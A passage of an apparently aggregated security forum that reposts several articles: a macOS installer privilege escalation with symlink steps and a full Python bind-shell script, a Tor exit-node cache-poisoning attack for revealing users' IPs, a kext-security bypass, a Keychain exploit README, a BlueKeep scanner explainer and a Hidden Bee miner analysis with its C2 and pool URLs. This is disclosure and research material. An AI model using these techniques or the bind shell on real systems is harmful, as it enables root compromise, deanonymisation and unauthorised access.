if there is another activation needed, that could be also a good countermeasure. But apps that doesn’t have these can be easily stolen. Developers should build-in some verification of Apple IDs. I’m not sure that it’s possible but would be useful for them. Privilege escalation returns on Mojave The fix This year (2019) I’ve been talking to a few people about this, and it hit me, that I didn’t do any further checks if symlinks are completely broken (during the installation) or not. It turned out that they are still a thing. The way the fix is working is that installd has no longer access to the crontab folder (/usr/lib/cron/tabs) even running as root, so it won’t be able to create files there. I’m not even sure that this is a direct fix for my POC or some other coincidence. We can find the related error message in /var/log/install.log (you can use the Console app for viewing logs): 2019-01-31 20:44:49+01 csabymac shove[1057]: [source=file] failed _RelinkFile(/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/401FEDFC-1D7B-4E47-A6E9-E26B83F8988F.activeSandbox/Root/Applications/Crontab Creator.app/Contents/Resources/peter, /private/var/at/tabs/peter): Operation not permitted The problem The installd process had still access to other folders, and can drop files there during the redirection, and those could be abused as well. I tested and you could redirect file writes to the following potentially dangerous folders: /var/root/Library/Preferences/ Someone could drop a file called com.apple.loginwindow.plist, which can contain a LoginHook, which will run as root. /Library/LaunchDaemons/ Dropping a plist file here will execute as root /Library/StartupItems/ Dropping a file here will also execute as root. You can also write to /etc. Dropping files into these locations are essentially the same idea as dropping a file to the crontab folder. Potentially many other folders are also affected, so you can craft malicious dylib files, etc… but I didn’t explore other options. The 2nd POC With that, and now being an ‘experienced’ macOS developer, I made a new POC, called StartUp. It’s this:‎StartUp on the Mac App Store It is really built along the same line as the previous one, but in this case for LaunchDaemons. The way to utilize it is: cd /Applications/ mkdir “StartUp.app” cd StartUp.app/ mkdir Contents cd Contents/ ln -s /Library/LaunchDaemons/ Resources cd /Applications/ mkdir Scripts cd Scripts/ Here you can create a sample.sh script that will run as root after booting up. For myself I put a bind shell into that script, and after login, connecting to it I got a root shell, but it’s up to you what you put there. #sample.sh python /Applications/Scripts/bind.py #bind.py #!/usr/bin/python2 """ Python Bind TCP PTY Shell - testing version infodox - insecurety.net (2013) Binds a PTY to a TCP port on the host it is ran on. """ import os import pty import socket lport = 31337 # XXX: CHANGEME def main(): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind(('', lport)) s.listen(1) (rem, addr) = s.accept() os.dup2(rem.fileno(),0) os.dup2(rem.fileno(),1) os.dup2(rem.fileno(),2) os.putenv("HISTFILE",'/dev/null') pty.spawn("/bin/bash") s.close() if __name__ == "__main__": main() Reporting to Apple I reported this around February to Apple, and tried to explain again in very detailed why I think the entire installation process is still broken, and could be abused. The security enhancement Apple never admitted this as a security bug, they never assigned a CVE, they considered it as an enhancement. Finally this came with Mojave 10.14.5, and they even mentioned my name on their website. I made a quick test, and it turned out that they eventually managed to fix it properly. If you create the App’s folder, place there files, those will be all wiped. Using FireEye’s Monitor.app we can actually see it. The first event shows that they move the entire folder. Being in Game Of Thrones mood I imagine it like this: The following event shows that they install the application into its proper location: So you can no longer drop there your files, etc… I like the way this got fixed eventually, and I would like to thank Apple for that. I would like to also thank for Patrick Wardle who was really helpful whenever I turned to him with my n00b macOS questions. To be continued… The story goes on, as I bypassed Apple’s fix. An update will follow once they fixed the issue. Sursa: https://theevilbit.github.io/posts/getting_root_with_benign_appstore_apps/
  20. Disclosing Tor users' real IP address through 301 HTTP Redirect Cache Poisoning Written on May 29, 2019 This blog post describes a practical application of the ‘HTTP 301 Cache Poisoning” attack that can be used by a malicious Tor exit node to disclose real IP address of chosen clients. PoC Video Client: Chrome Canary (76.0.3796.0) Client real IP address: 5.60.164.177 Client tracking parameter: 6b48c94a-cf58-452c-bc50-96bace981b27 Tor exit node IP address: 51.38.150.126 Transparent Reverse Proxy: tor.modlishka.io (Modlishka - updated code to be released.) Note: In this scenario Chrome was configured, through SOCKS5 settings, to use the Tor network. Tor circuit was set to a particular Tor test exit node: ‘51.38.150.126’. This is also a proof-of-concept and many things can be further optimized… On the malicious Tor exit node all of the traffic is being redirect to Modlishka proxy: iptables -A OUTPUT -p tcp -m tcp --dport 80 -j DNAT --to-destination ip_address:80 iptables -A FORWARD -j ACCEPT https://vimeo.com/339586722 Example Attack Scenario Description Assumptions: Browser-based application (in this case a standard browser) that will connect through the Tor network and, finally, through a malicious Tor exit node. Malicious Tor exit node that is intercepting and HTTP 301 cache poisoning all of the non-tls HTTP traffic. Lets consider the following attack scenario steps: User connects to the Internet through the Tor network either by setting up browsers’ settings to use the Tor SOCKS5 or system wide, where the whole OS traffic is being routed through the TOR network. User begins his typical browsing session with his favorite browser, where usually a lot of non-TLS HTTP traffic is being sent through the Tor tunnel. Evil Tor exit node intercepts those non-TLS requests and responds with a HTTP 301 permanent redirect to each of them. These redirects will be cached permanently by the browser and will point to a tracking URL with an assigned TOR client identifier. The tracking URL can be created in the following way: http://user-identifier.evil.tld. Where ‘evil.tld’ will collect all source IP information and redirect clients to the originally requested hosts … or, as an alternative, to a transparent reverse proxy that will try to intercept all of the clients subsequent HTTP traffic flow. Furthermore, since it is also possible to carry out an automated cache pollution for the most popular domains (as described in the previous post), e.g. TOP Alexa 100 , an attacker can maximize his chances of disclosing the real IP address. User, after closing the Tor session, will switch back to his usual network. As soon user types into the URL address bar one of the previously poisoned entries, e.g. “google.com,” browser will use the cache and internally redirect to the tracking URL with an exit-node context identifier. Exit node will now be able to correlate previously intercepted HTTP request and users’ real IP address through the information gathered on the external host that used tracking URL with user identifier. The evil.tld host will have information about all of the IP addresses that were used to access that tracking URL. Obviously, this gives a possibility to effectively correlate chosen HTTP requests with the client IP address by the Tor exit node. This is because the previously generated tracking URL will be requested by the client through the Tor tunell and later, after connecting through a standard ISP connection, again. This is because of the poisoned cache entries. Another approach, might rely on injecting modified JavaScript with embeded tracking URLS into the relevant non-TLS responses and setting up the right Cache control headers (e.g. to ‘Cache-Control: max-age=31536000’). However, this approach wouldn’t be very effective. Tracking users through standard cookies, by different web applications is also possible, but it’s not easy to force the client to visit the same, attacker-controlled, domain twice: once while it’s connecting through the Tor exit node and later after it switched back to the standard ISP connection. Conclusions The fact that it is possible to achieve certain persistency in browsers cache, by injecting poisoned entries, can be abused by an attacker to disclose real IP address of the Tor users that send non-TLS HTTP traffic through malicious exit nodes. Furthermore, poisoning a significant number of popular domain names will increase the likelihood of recieving a callback HTTP request (with assigned user identifier), that will allow to disclose users real IP. An attempt can be also made to ‘domain hook’ some of the browser-based clients and hope that a mistyped domain name will not be noticed by the user or will not be displayed (e.g. mobile application WebViews). Possible mitigation: When connecting through the Tor network ensure that all non-TLS traffic is disabled. Example browser plugins that can be used: “Firefox”, “Chrome”. Additionally, always use browser ‘private’ mode for browsing through Tor. Do not route all of your OS traffic through Tor without ensuring that there TLS traffic only… Use latest version of the Tor browser whenever possible for browsing web pages. References https://blog.duszynski.eu/domain-hijack-through-http-301-cache-poisoning/ - “HTTP 301 Cache Poisoning Attack” https://www.torproject.org/download/ - “Tor Browser” Sursa: https://blog.duszynski.eu/tor-ip-disclosure-through-http-301-cache-poisoning/
  21. How to bypass Mojave 10.14.5’s new kext security I fear with the onset of notarization, this scenario is going to become increasingly common: you’ve just tried to install software which you understand includes at least one kernel extension, and has worked fine before macOS 10.14.5 (which you’re running). The install fails for no apparent reason. What do you do next? The probable cause is that one or more of the kernel extensions haven’t been notarized, and the security system in macOS has taken exception to that, refusing to install them. Of course there are a thousand and one other possible reasons, but here I’ll assume it’s the result of this change in security. Check first to ensure that you’re not overlooking the normal security dialog, which invites you to open the Security & Privacy pane and agree to the extensions being installed there. The only piece of information that you require is the developer ID of those kernel extensions. The simplest way to obtain this now is to open the Installer package using Suspicious Package. There, locate one of the kernel extensions, open the contextual menu, and export that whole kext (the folder with the extension .kext) to your Downloads folder. To get the developer ID and check whether that extension has been notarized in one fell swoop, use the spctl command in the form spctl -a -vv -t install mykext.kext One easy way to do this is to type most of the command spctl -a -vv -t install then drag and drop the extension from your Downloads folder to the end of that line, where its path and name should appear, e.g. /Users/hoakley/Downloads/VBoxDrv.kext Then press Return, and you should see three lines of response: mykext.kext: accepted source=Developer ID origin=Developer ID Application: DeveloperName (NJ2ABCUVC1) If the extension is notarized already, they will instead look like mykext.kext: accepted source=Notarized Developer ID origin=Developer ID Application: DeveloperName (NJ2ABCUVC1) Make a note on paper or your iOS device of the developer ID provided in parentheses, as you’ll need those in a few moments. Close your apps down and restart your Mac in Recovery mode. There, open Terminal and type in the command /usr/sbin/spctl kext-consent add NJ2ABCUVC1 where the code at the end is exactly the same as the developer ID which you just obtained from spctl. Press Return, wait for the command prompt to appear again, then quit Terminal and restart in normal mode. Now when you try running the Installer package, you should find that its extensions install correctly, as you’ve bypassed the new kext security controls. Please let the developer know of your problems and this workaround: they need to get their kernel extensions notarized to spare other users of this same rigmarole. New spctl features and wrinkles The man page for spctl hasn’t been updated for over six years, but in 2017 it gained a set of actions to handle kernel extensions and your consent for them to be installed – what Apple terms User Approved or Secure Kernel Extension loading. You should be able to see these if you call spctl with the -h option. These kext-consent commands only work when you’re booted in Recovery mode: they should return errors if you’re running in regular mode. This appears to unblock kernel extensions which macOS won’t install because they don’t comply with the new rules on notarization, presumably by adding the kernel extension to the new whitelist which was installed as part of the macOS 10.14.5 update. Kernel extensions which are correctly notarized should result in the display of the consent dialog taking the user to Security & Privacy; those which aren’t and don’t appear in the whitelist are simply blocked and not installed now. To show whether the normal system for obtaining user consent to install extensions is enabled: spctl kext-consent status To enable the normal system for obtaining user consent: spctl kext-consent enable and disable to disable, of course. To list the developer IDs which are allowed to load extensions without user consent spctl kext-consent list To add a developer ID to the list of those allowed to load kernel extensions without user consent spctl kext-consent add [devID] as used above, and remove to remove that. It is strange that this control using kext-consent works at a developer ID level, thus applies to all kernel extensions from that developer, whereas notarization is specific to an individual release of a certain code bundle from that developer. Sursa: https://eclecticlight.co/2019/06/01/how-to-bypass-mojave-10-14-5s-new-kext-security/
  22. KeySteal KeySteal is a macOS <= 10.13.3 Keychain exploit that allows you to access passwords inside the Keychain without a user prompt. KeySteal consists of two parts: KeySteal Daemon: This is a daemon that exploits securityd to get a session that is allowed to access the Keychain without a password prompt. KeySteal Client: This is a library that can be injected into Apps. It will automatically apply a patch that forces the Security Framework to use the session of our keysteal daemon. Building and Running Open the KeySteal Xcode Project Build the keystealDaemon and keystealClient Open the directory which contains the built daemon and client (right cick on keystealDaemon -> Open in Finder) Run dump-keychain.sh TODO Add a link to my talk about this vulnerability at Objective by the Sea License For most files, see LICENSE.txt. The following files were taken (or generated) from Security-58286.220.15 and are under the Apple Public Source License: handletypes.h ss_types.h ucsp_types.h ucsp.hpp ucspUser.cpp A copy of the Apple Public Source License can be found here. Sursa: https://github.com/LinusHenze/Keysteal
      • 1
      • Haha
  23. By its nature, networking code is both complex and security critical. Any data received from the network is potentially malicious and therefore needs to be handled extremely carefully. However, the multitude of different networking protocols, such as IP, IPv6, TCP, and UDP, inevitably make the networking code very complicated, thereby making it more difficult to ensure that the code is bug free. For example, many of the functions in Apple’s networking code are thousands of lines long, with a huge number of different control flow paths to handle all the possible flags and options. Over the course of 2018, I found and reported a number of RCE vulnerabilities in iOS and macOS, all related to mbuf processing in Apple’s XNU operating system kernel: CVE-2018-4249, -4259, -4286, -4287, -4288, -4291, -4407, -4460. The mbuf datatype is used by the networking code in XNU to store and process all incoming and outgoing network packets. In this talk I will explain some of the low level details of how network packets are structured, and how the mbuf datatype is used to process them in XNU. I will discuss some of the corner cases that were handled incorrectly in XNU, making the code vulnerable to remote attack. I will also talk about how I discovered each vulnerability using custom-written variant analysis with Semmle QL (http://github.com/Semmle/QL), a research technique that complements other bug-finding techniques such as fuzzing. To finish off, I will explain the C programming techniques that I used to implement PoC exploits for each of these vulnerabilities, with demonstrations of these exploits in action (crashing the kernel).
  24. Friday, May 31, 2019 Avoiding the DoS: How BlueKeep Scanners Work Background RDP Channel Internals MS_T120 I/O Completion Packets MS_T120 Port Data Dispatch Patch Detection Vulnerable Host Behavior Patched Host Behavior CPU Architecture Differences Conclusion Background On May 21, @JaGoTu and I released a proof-of-concept for CVE-2019-0708. This vulnerability has been nicknamed "BlueKeep". Instead of causing code execution or a blue screen, our exploit was able to determine if the patch was installed. Now that there are public denial-of-service exploits, I am willing to give a quick overview of the luck that allows the scanner to avoid a blue screen and determine if the target is patched or not. RDP Channel Internals The RDP protocol has the ability to be extended through the use of static (and dynamic) virtual channels, relating back to the Citrix ICA protocol. The basic premise of the vulnerability is that there is the ability to bind a static channel named "MS_T120" (which is actually a non-alpha illegal name) outside of its normal bucket. This channel is normally only used internally by Microsoft components, and shouldn't receive arbitrary messages. There are dozens of components that make up RDP internals, including several user-mode DLLs hosted in a SVCHOST.EXE and an assortment of kernel-mode drivers. Sending messages on the MS_T120 channel enables an attacker to perform a use-after-free inside the TERMDD.SYS driver. That should be enough information to follow the rest of this post. More background information is available from ZDI. MS_T120 I/O Completion Packets After you perform the 200-step handshake required for the (non-NLA) RDP protocol, you can send messages to the individual channels you've requested to bind. The MS_T120 channel messages are managed in the user-mode component RDPWSX.DLL. This DLL spawns a thread which loops in the function rdpwsx!IoThreadFunc. The loop waits via I/O completion port for new messages from network traffic that gets funneled through the TERMDD.SYS driver. Note that most of these functions are inlined on Windows 7, but visible on Windows XP. For this reason I will use XP in screenshots for this analysis. MS_T120 Port Data Dispatch On a successful I/O completion packet, the data is sent to the rdpwsx!MCSPortData function. Here are the relevant parts: We see there are only two valid opcodes in the rdpwsx!MCSPortData dispatch: 0x0 - rdpwsx!HandleConnectProviderIndication 0x2 - rdpwsx!HandleDisconnectProviderIndication + rdpwsx!MCSChannelClose If the opcode is 0x2, the rdpwsx!HandleDisconnectProviderIndication function is called to perform some cleanup, and then the channel is closed with rdpwsx!MCSChannelClose. Since there are only two messages, there really isn't much to fuzz in order to cause the BSoD. In fact, almost any message dispatched with opcode 0x2, outside of what the RDP components are expecting, should cause this to happen. Patch Detection I said almost any message, because if you send the right sized packet, you will ensure that proper cleanup is performed: It's real simple: If you send a MS_T120 Disconnect Provider (0x2) message that is a valid size, you get proper clean up. There should not be risk of denial-of-service. The use-after-free leading to RCE and DoS only occurs if this function skips the cleanup because the message is the wrong size! Vulnerable Host Behavior On a VULNERABLE host, sending the 0x2 message of valid size causes the RDP server to cleanup and close the MS_T120 channel. The server then sends a MCS Disconnect Provider Ultimatum PDU packet, essentially telling the client to go away. And of course, with an invalid size, you RCE/BSoD. Patched Host Behavior However on a patched host, sending the MS_T120 channel message in the first place is a NOP... with the patch you can no longer bind this channel incorrectly and send messages to it. Therefore, you will not receive any disconnection notice. In our scanner PoC, we sleep for 5 seconds waiting for the MCS Disconnect Provider Ultimatum PDU, before reporting the host as patched. CPU Architecture Differences Another stroke of luck is the ability to mix and match the x86 and x64 versions of the 0x2 message. The 0x2 messages require different sizes between the two architectures, which one might think sending both at once should cause the denial-of-service. Simply, besides the sizes being different, the message opcode is in a different offset. So on the opposite architecture, with a 0'd out packet (besides the opcode), it will think you are trying to perform the Connect 0x0 message. The Connect 0x0 message requires a much larger message and other miscellaneous checks to pass before proceeding. The message for another architecture will just be ignored. This difference can possibly also be used in an RCE exploit to detect if the target is x86 or x64, if a universal payload is not used. Conclusion This is an interesting quirk that luckily allows system administrators to quickly detect which assets remain unpatched within their networks. I released a similar scanner for MS17-010 about a week after the patch, however it went largely unused until big-name worms such as WannaCry and NotPetya started to hit. Hopefully history won't repeat and people will use this tool before a crisis. Unfortunately, @ErrataRob used a fork of our original scanner to determine that almost 1 million hosts are confirmed vulnerable and exposed on the external Internet. It is my knowledge that the 360 Vulcan team released a (closed-source) scanner before @JaGoTu and I, which probably follows a similar methodology. Products such as Nessus have now incorporated plugins with this methodology. While this blog post discusses new details about RDP internals related the vulnerability, it does not contain useful information for producing an RCE exploit that is not already widely known. Posted by zerosum0x0 at 12:00:00 AM Sursa: https://zerosum0x0.blogspot.com/2019/05/avoiding-dos-how-bluekeep-scanners-work.html
  25. Hidden Bee: Let’s go down the rabbit hole Posted: May 31, 2019 by hasherezade Last updated: June 1, 2019 Some time ago, we discussed the interesting malware, Hidden Bee. It is a Chinese miner, composed of userland components, as well as of a bootkit part. One of its unique features is a custom format used for some of the high-level elements (this format was featured in my recent presentation at SAS). Recently, we stumbled upon a new sample of Hidden Bee. As it turns out, its authors decided to redesign some elements, as well as the used formats. In this post, we will take a deep dive in the functionality of the loader and the included changes. Sample 831d0b55ebeb5e9ae19732e18041aa54 – shared by @James_inthe_box Overview The Hidden Bee runs silently—only increased processor usage can hint that the system is infected. More can be revealed with the help of tools inspecting the memory of running processes. Initially, the main sample installs itself as a Windows service: Hidden Bee service However, once the next component is downloaded, this service is removed. The payloads are injected into several applications, such as svchost.exe, msdtc.exe, dllhost.exe, and WmiPrvSE.exe. If we scan the system with hollows_hunter, we can see that there are some implants in the memory of those processes: Results of the scan by hollows_hunter Indeed, if we take a look inside each process’ memory (with the help of Process Hacker), we can see atypical executable elements: Hidden Bee implants are placed in RWX memory Some of them are lacking typical PE headers, for example: Executable in one of the multiple customized formats used by Hidden Bee But in addition to this, we can also find PE files implanted at unusual addresses in the memory: Manually-loaded PE files in the memory of WmiPrvSE.exe Those manually-loaded PE files turned out to be legitimate DLLs: OpenCL.dll and cudart32_80.dll(NVIDIA CUDA Runtime, Version 8.0.61 ). CUDA is a technology belonging to NVidia graphic cards. So, their presence suggests that the malware uses GPU in order to boost the mining performance. When we inspect the memory even closer, we see within the executable implants there are some strings referencing LUA components: Strings referencing LUA scripting language, used by Hidden Bee components Those strings are typical for the Hidden Bee miner, and they were also mentioned in the previous reports. We can also see the strings referencing the mining activity, i.e. the Cryptonight miner. List of modules: bin/i386/coredll.bin dispatcher.lua bin/i386/ocl_detect.bin bin/i386/cuda_detect.bin bin/amd64/coredll.bin bin/amd64/algo_cn_ocl.bin lib/amd64/cudart64_80.dll src/cryptonight.cl src/cryptonight_r.cl bin/i386/algo_cn_ocl.bin config.lua lib/i386/cudart32_80.dll src/CryptonightR.cu bin/i386/algo_cn.bin bin/amd64/precomp.bin bin/amd64/ocl_detect.bin bin/amd64/cuda_detect.bin lib/amd64/opencl.dll lib/i386/opencl.dll bin/amd64/algo_cn.bin bin/i386/precomp.bin And we can even retrieve the miner configuration: configuration.set("stratum.connect.timeout",20) configuration.set("stratum.login.timeout",60) configuration.set("stratum.keepalive.timeout",240) configuration.set("stratum.stream.timeout",360) configuration.set("stratum.keepalive",true) configuration.set("job.idle.count",30) configuration.set("stratum.lock.count",30) configuration.set("miner.protocol","stratum+ssl://r.twotouchauthentication.online:17555/") configuration.set("miner.username",configuration.uuid()) configuration.set("miner.password","x") configuration.set("miner.agent","MinGate/5.1") view rawconfig.lua hosted with by GitHub Inside Hidden Bee has a long chain of components that finally lead to loading of the miner. On the way, we will find a variety of customized formats: data packages, executables, and filesystems. The filesystems are going to be mounted in the memory of the malware, and additional plugins and configuration are retrieved from there. Hidden Bee communicates with the C&C to retrieve the modules—on the way also using its own TCP-based protocol. The first part of the loading process is described by the following diagram: Each of the .spk packages contains a custom ‘SPUTNIK’ filesystem, containing more executable modules. Starting the analysis from the loader, we will go down to the plugins, showing the inner workings of each element taking part in the loading process. The loader In contrast to most of the malware that we see nowadays, the loader is not packed by any crypter. According the header, it was compiled in November 2018. While in the former edition the modules in the custom formats were dropped as separate files, this time the next stage is unpacked from inside the loader. The loader is not obfuscated. Once we load it with typical tools (IDA), we can clearly see how the new format is loaded. The loading function Section .shared contains the configuration: Encrypted configuration. The last 16 bytes after the data block is the key. The configuration is decrypted with the help of XTEA algorithm. Decrypting the configuration The decrypted configuration must start from the magic WORD “pZ.” It contains the C&C and the name under which the service will be installed: Unscrambling the NE format The NE format was seen before, in former editions of Hidden Bee. It is just a scrambled version of the PE. By observing which fields have been misplaced, we can easily reconstruct the original PE. The loader, unpacking the next stage NE is one of the two similar formats being used by this malware. Another similar one starts from a DWORD 0x0EF1FAB9 and is used to further load components. Both of them have an analogical structure that comes from slightly modified PE format: Header: WORD magic; // 'NE' WORD pe_offset; WORD machine_id; The conversion back to PE format is trivial: It is enough to add the erased magic numbers: MZ and PE, and to move displaced fields to their original offsets. The tool that automatically does the mentioned conversion is available here. In the previous edition, the parts of Hidden Bee with analogical functionality were delivered in a different, more complex proprietary format than the one currently being analyzed. Second stage: a downloader (in NE format) As a result of the conversion, we get the following PE: (fddfd292eaf33a490224ebe5371d3275). This module is a downloader of the next stage. The interesting thing is that the subsystem of this module is set as a driver, however, it is not loaded like a typical driver. The custom loader loads it into a user space just like any typical userland component. The function at the module’s Entry Point is called with three parameters. The first is a path of the main module. Then, the parameters from the configuration are passed. Example: 0012FE9C 00601A34 UNICODE "\"C:\Users\tester\Desktop\new_bee.exe\"" 0012FEA0 00407104 UNICODE "NAPCUYWKOxywEgrO" 0012FEA4 00407004 UNICODE "118.41.45.124:9000" Calling the Entry Point of the manually-loaded NE module The execution of the module can take one of the two paths. The first one is meant for adding persistence: The module installs itself as a service. If the module detects that it is already running as a service, it takes the second path. In such a case, it proceeds to download the next module from the server. The next module is packed as as Cabinet file. The downloaded Cabinet file is being passed to the unpacking function It is first unpacked into a file named “core.sdb”. The unpacked module is in a customized format based on PE. This time, the format has a different signature: “NS” and it is different from the aforementioned “NE” format (detailed explanation will be given further). It is loaded by the proprietary loader. The loader enumerates all the executables in a directory: %Systemroot%\Microsoft.NET\ and selects the ones with the compatible bitness (in the analyzed case it was selecting 32bit PEs). Once it finds a suitable PE, it runs it and injects the payload there. The injected code is run by adding its entry point to APC queue. Hidden Bee component injecting the next stage (core.sdb) into a new process In case it failed to find the suitable executable in that directory, it performs the injection into dllhost.exe instead. Unscrambling the NS format As mentioned before, the core.sdb is in yet another format named NS. It is also a customized PE, however, this time the conversion is more complex than the NE format because more structures are customized. It looks like a next step in the evolution of the NE format. Header of the NS format We can see that the changes in the PE headers are bigger and more lossy—only minimalist information is maintained. Only few Data Directories are left. Also the sections table is shrunk: Each section header contains only four out of nine fields that are in the original PE. Additionally, the format allows to pass a runtime argument from the loader to the payload via header: The pointer is saved into an additional field (marked “Filled Data” on the picture). Not only is the PE header shrunk. Similar customization is done on the Import Table: Customized part of the NS format’s import table This custom format can also be converted back to the PE format with the help of a dedicated converter, available here. Third stage: core.sdb The core.sdb module converted to PE format is available here: a17645fac4bcb5253f36a654ea369bf9. The interesting part is that the external loader does not complete the full loading process of the module. It only copies the sections. But the rest of the module loading, such as applying relocations and filling imports, is done internally in the core.sdb. The loading function is just at the Entry Point of core.sdb The previous component was supposed to pass to the core.sdb an additional buffer with the data about the installed service: the name and the path. During its execution, core.sdb will look up this data. If found, it will delete the previously-created service, and the initial file that started the infection: Removing the initial service Getting rid of the previous persistence method suggests that it will be replaced by some different technique. Knowing previous editions of Hidden Bee, we can suspect that it may be a bootkit. After locking the mutex in a format Global\SC_{%08lx-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x}, the module proceeds to download another component. But before it goes to download, first, a few things are checked. Checks done before download of the next module First of all, there is a defensive check if any of the known debuggers or sniffers are running. If so, the function quits. The blacklist Also, there is a check if the application can open a file ‘\??\NPF-{0179AC45-C226-48e3-A205-DCA79C824051}’. If all the checks pass, the function proceeds and queries the following URL, where GET variables contain the system fingerprint: sltp://bbs.favcom.space:1108/setup.bin?id=999&sid=0&sz=a7854b960e59efdaa670520bb9602f87&os=65542&ar=0 The hash (sz=) is an MD5 generated from VolumeIDs. Then follows the (os=) identifying version of the operating system, and the identifier of the architecture (ar=), where 0 means 32 bit, 1 means 64bit. The content downloaded from this URL (starting from a magic DWORD 0xFEEDFACE – 79e851622ac5298198c04034465017c0) contains the encrypted package (in !rbx format), and a shellcode that will be used to unpack it. The shellcode is loaded to the current process and then executed. The ‘FEEDFACE’ module contains the shellcode to be loaded The shellcode’s start function uses three parameters: pointer to the functions in the previous module (core sdb), pointer to the buffer with encrypted data, size of the encrypted data. The loader calling the shellcode Fourth stage: the shellcode decrypting !rbx The beginning of the loaded shellcode: The shellcode does not fill any imports by itself. Instead, it fully relies on the functions from core.sdb module, to which it passes the pointer. It makes use of the following function: malloc, mecpy, memfree, VirtualAlloc. Example: calling malloc via core.sdb Its role is to reveal another part. It comes in an encrypted package starting from a marker !rbx. The decryption function is called just at the beginning: Calling the decrypting function (at Entry Point of the shellcode) First, the function checks the !rbx marker and the checksum at the beginning of the encrypted buffer: Checking marker and then checksum It is decrypted with the help of RC4 algorithm, and then decompressed. After decryption, the markers at the beginning of the buffer are checked. The expected format must start from predefined magic DWORDs: 0xCAFEBABE,0, 0xBABECAFE: The !rbx package format The !rbx is also a custom format with a consistent structure. DWORD magic; // "!rbx" DWORD checksum; DWORD content_size; BYTE rc4_key[16]; DWORD out_size; BYTE content[]; The custom file system (BABECAFE) The full decrypted content has a consistent structure, reminiscent of a file system. According to the previous reports, earlier versions of Hidden Bee used to adapt the ROMS filesystem, adding few modifications. They called their customized version “Mixed ROM FS”. Now it seems that their customization process has progressed. Also the keywords suggesting ROMFS cannot be found. The headers starts from the markers in the form of three DWORDS: { 0xCAFEBABE, 0, 0xBABECAFE }. The layout of BABECAFE FS: We notice that it differs at many points from ROM FS, from which it evolved. The structure contains the following files: /bin/amd64/coredll.bin /bin/i386/coredll.bin /bin/i386/preload /bin/amd64/preload /pkg/sputnik.spk /installer/com_x86.dll (6177bc527853fe0f648efd17534dd28b) /installer/com_x64.dll /pkg/plugins.spk The files /pkg/sputnik.spk and /pkg/plugins.spk are both compressed packages in a custom !rsi format. Beginning of the !rsi package in the BABECAFE FS Each of the spk packages contain another custom filesystem, identified by the keyword SPUTNIK (possibly the extension ‘spk’ is derived from the SPUTNIK format). They will be unpacked during the next steps of the execution. Unpacked plugins.spk: 4c01273fb77550132c42737912cbeb36 Unpacked sputnik.spk: 36f3247dad5ec73ed49c83e04b120523. Selecting and running modules Some executables stored in the filesystem are in two version: 32 and 64 bit. Only the modules relevant to the current architecture are loaded. So, in the analyzed case, the loader chooses first: /bin/i386/preload (shellcode) and /bin/i386/coredll.bin (a module in NS custom format). The names are hardcoded in the loader within the loading shellcode: Searching the modules in the custom file system After the proper elements are fetched (preload and coredll.bin), they are copied together into a newly-allocated memory area. The coredll.bin is copied just after preload. Then, the preload module is called: Redirecting execution to preload The preload is position-independent, and its execution starts from the beginning of the page. Entering ‘preload’ The only role of this shellcode is to prepare and run the coredll.bin. So, it contains a custom loader for the NS format that allocates another memory area and loads the NS file there. Fifth stage: preload and coredll After loading coredll, preload redirects the execution there. coredll at its Entry Point The coredll patches a function inside the NTDLL— KiUserExceptionDispatcher—redirecting one of the inner calls to its own code: A patch inside KiUserExceptionDispatcher Depending on which process the coredll was injected into, it can take one of a few paths of execution. If it is running for the first time, it will try to inject itself again—this time into rundll32. For the purpose of the injection, it will again unpack the original !rbx package and use its original copy stored there. Entering the unpacking function Inside the unpacking function: checking the magic “!rbx” Then it will choose the modules depending on the bitness of the rundll32: It selects the pair of modules (preload/coredll.bin) appropriate for the architecture, either from the directory amd64 or from i386: If the injection failed, it makes another attempt, this time trying to inject into dllhost: Each time it uses the same, hardcoded parameter (/Processid: {...}) that is passed to the created process: The thread context of the target process is modified, and then the thread is resumed, running the injected content: Now, when we look inside the memory of rundll32, we can find the preload and coredll being mapped: Inside the injected part, the execution follows a similar path: preload loads the coredll and redirects to its Entry Point. But then, another path of execution is taken. The parameter passed to the coredll decides which round of execution it is. On the second round, another injection is made: this time to dllhost.exe. And finally, it proceeds to the final round, when other modules are unpacked from the BABECAFE filesystem. Parameter deciding which path to take The unpacking function first searches by name for two more modules: sputnik.spk and plugins.spk. They are both in the mysterious !rsi format, which reminds us of !rbx, but has a slightly different structure. Entering the function unpacking the first !rsi package: The function unpacking the !rsi format is structured similarly to the !rbx unpacking. It also starts from checking the keyword: Checking “!rsi” keyword As mentioned before, both !rsi packages are used to store filesystems marked with the keyword “SPUTNIK”. It is another custom filesystem invented by the Hidden Bee authors that contain additional modules. The “SPUTNIK” keyword is checked after the module is unpacked Unpacking the sputnik.spk resulted in getting the following SPUTNIK module: 455738924b7665e1c15e30cf73c9c377 It is worth noting that the unpacked filesystem has inside of it four executables: two pairs consisting of NS and PE, appropriately 32 and 64 bit. In the currently-analyzed setup, 32 bit versions are deployed. The NS module will be the next to be run. First, it is loaded by the current executable, and then the execution is redirected there. Interestingly, both !rsi modules are passed as arguments to the entry point of the new module. (They will be used later to retrieve more components.) Calling the newly-loaded NS executable Sixth stage: mpsi.dll (unpacked from SPUTNIK) Entering into the NS module starts another layer of the malware: Entry Point of the NS module: the !rsi modules, perpended with their size, are passed The analyzed module, converted to PE is available here: 537523ee256824e371d0bc16298b3849 This module is responsible for loading plugins. It will also create a named pipe through which it is will communicate with other modules. It sets up the commands that are going to be executed on demand. This is how the beginning of the main function looks: Like in previous cases, it starts from finishing to load itself (relocations and imports). Then, it patches the function in NTDLL. This is a common prolog in many HiddenBee modules. Then, we have another phase of loading elements from the supplied packages. The path that will be taken depends on the runtime arguments. If the function received both !rsi packages, it will start by parsing one of them, retrieving loading submodules. First, the SPUTNIK filesystem must be unpacked from the !rsi package: After being unpacked, it is mounted. The filesystems are mounted internally in the memory: A global structure is filled with pointers to appropriate elements of the filesystem. At the beginning, we can see the list of the plugins that are going to be loaded: cloudcompute.api, deepfreeze.api, and netscan.api. Those names are being appended to the root path of the modules. Each module is fetched from the mounted filesystem and loaded: Calling the function to load the plugin Consecutive modules are loaded one after another in the same executable memory area. After the module is loaded, its header is erased. It is a common technique used in order to make dumping of the payload from the memory more difficult. The cloudcompute.api is a plugin that will load the miner. More about the plugins will be explained in the next section of this post. Reading its code, we find out that the SPUTNIK modules are filesystems that can be mounted and dismounted on demand. This module will be communicating with others with the help of a named pipe. It will be receiving commands and executing appropriate handlers. Initialization of the commands’ parser: The function setting up the commands: For each name, a handler is registered. (This is probably the 